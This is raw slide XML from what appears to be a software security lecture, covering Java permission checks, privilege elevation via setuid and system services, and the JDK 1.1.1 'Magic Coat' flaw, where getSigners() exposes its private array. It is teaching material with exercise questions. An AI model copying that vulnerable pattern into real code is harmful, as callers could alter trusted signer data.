              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0" err="1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FileDeletionPermission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill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);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 dirty="0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       delete filename;}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial Unicode MS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800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial Unicode MS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7829" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F31375A-10C1-DC65-9A9E-03DF2BE309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3445053C-76E0-4ECB-9262-F082672A9256}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77830" name="Rounded Rectangular Callout 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53C8B81E-A41C-7064-269B-68A9ABA9F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949325"/>
            <a:ext cx="3584575" cy="1565275"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -112244"/>
              <a:gd name="adj2" fmla="val 6146"/>
              <a:gd name="adj3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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>m1 is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, because Strings are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>immutable   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(assuming there are no TOCTOU vulnerabilities in the underlying file systems, eg due to symbolic links)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="140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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD0F5DA9-6D41-5BAD-ABC3-311EE8733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nl-NL"/>
              <a:t>Need for privilege elevation</a:t>
            </a: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9799AB6D-847D-F9B2-B445-A1279B1DE4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0000" tIns="46800" rIns="90000" bIns="46800"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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nl-NL" dirty="0"/>
              <a:t> Note the similarity between</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="40005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nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Methods which enable some permissions  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1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which temporarily raise privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> programs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows Local System Services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1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nl-NL" sz="1800" dirty="0"/>
              <a:t>which can be started by any user, but then run in admin mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t>invoked from a user program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1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nl-NL" sz="1800" dirty="0"/>
              <a:t>which cause a switch from user to kernel model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-338138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GB" altLang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-338138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nl-NL" dirty="0"/>
              <a:t>All are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trusted services that elevate the privileges of  their clients </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-280988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Comic Sans MS" panose="030F0702030302020204" pitchFamily="6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nl-NL" dirty="0"/>
              <a:t>hopefully in a secure way...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-280988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Comic Sans MS" panose="030F0702030302020204" pitchFamily="6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nl-NL" dirty="0"/>
              <a:t>if not: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privilege escalation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t>attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-338138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GB" altLang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-338138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altLang="nl-NL" dirty="0"/>
              <a:t>In any code review, such code obviously requires extra attention!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-338138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GB" altLang="nl-NL" dirty="0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E7505E71-0BC2-F9F6-537D-7B935677AE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4A1A7D8A-DC65-4131-B9B3-B2A82D53F4A3}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="93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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB22836E-6894-F05A-E7D2-40E06599F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7238" y="287338"/>
            <a:ext cx="8886825" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="538163" algn="l"/>
                <a:tab pos="1081088" algn="l"/>
                <a:tab pos="1624013" algn="l"/>
                <a:tab pos="2165350" algn="l"/>
                <a:tab pos="2708275" algn="l"/>
                <a:tab pos="3251200" algn="l"/>
                <a:tab pos="3792538" algn="l"/>
                <a:tab pos="4335463" algn="l"/>
                <a:tab pos="4878388" algn="l"/>
                <a:tab pos="5421313" algn="l"/>
                <a:tab pos="5962650" algn="l"/>
                <a:tab pos="6505575" algn="l"/>
                <a:tab pos="7048500" algn="l"/>
                <a:tab pos="7589838" algn="l"/>
                <a:tab pos="8132763" algn="l"/>
                <a:tab pos="8675688" algn="l"/>
                <a:tab pos="9218613" algn="l"/>
                <a:tab pos="9759950" algn="l"/>
                <a:tab pos="10302875" algn="l"/>
                <a:tab pos="10845800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL"/>
              <a:t>Security flaw in code signing check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="2200"/>
              <a:t>(Magic Coat)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F9C6F94-C0B9-7443-D407-2BE19EC3BC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9888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0"/>
              <a:t>Implementation of the class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-N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altLang="nl-NL" sz="1800" dirty="0"/>
              <a:t> in JDK1.1.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   package 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java.lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   public class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     private String[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>signers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     /** Obtain list of signers of given class */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     public String[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getSigners</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         { return signers;   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009900"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is the bug ? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009900"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How can it be fixed ? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009900"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Could it be prevented at language-level ?   </a:t>
            </a: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C7C29F3B-5B10-E1ED-CB18-9F8AC057A8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0D51DCC4-D2D8-40E2-920E-0D1ECB14DD86}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="93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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1209483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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFA976D6-23BC-5EB2-E607-99ABFDCEC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7238" y="287338"/>
            <a:ext cx="8805862" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="538163" algn="l"/>
                <a:tab pos="1081088" algn="l"/>
                <a:tab pos="1624013" algn="l"/>
                <a:tab pos="2165350" algn="l"/>
                <a:tab pos="2708275" algn="l"/>
                <a:tab pos="3251200" algn="l"/>
                <a:tab pos="3792538" algn="l"/>
                <a:tab pos="4335463" algn="l"/>
                <a:tab pos="4878388" algn="l"/>
                <a:tab pos="5421313" algn="l"/>
                <a:tab pos="5962650" algn="l"/>
                <a:tab pos="6505575" algn="l"/>
                <a:tab pos="7048500" algn="l"/>
                <a:tab pos="7589838" algn="l"/>
                <a:tab pos="8132763" algn="l"/>
                <a:tab pos="8675688" algn="l"/>
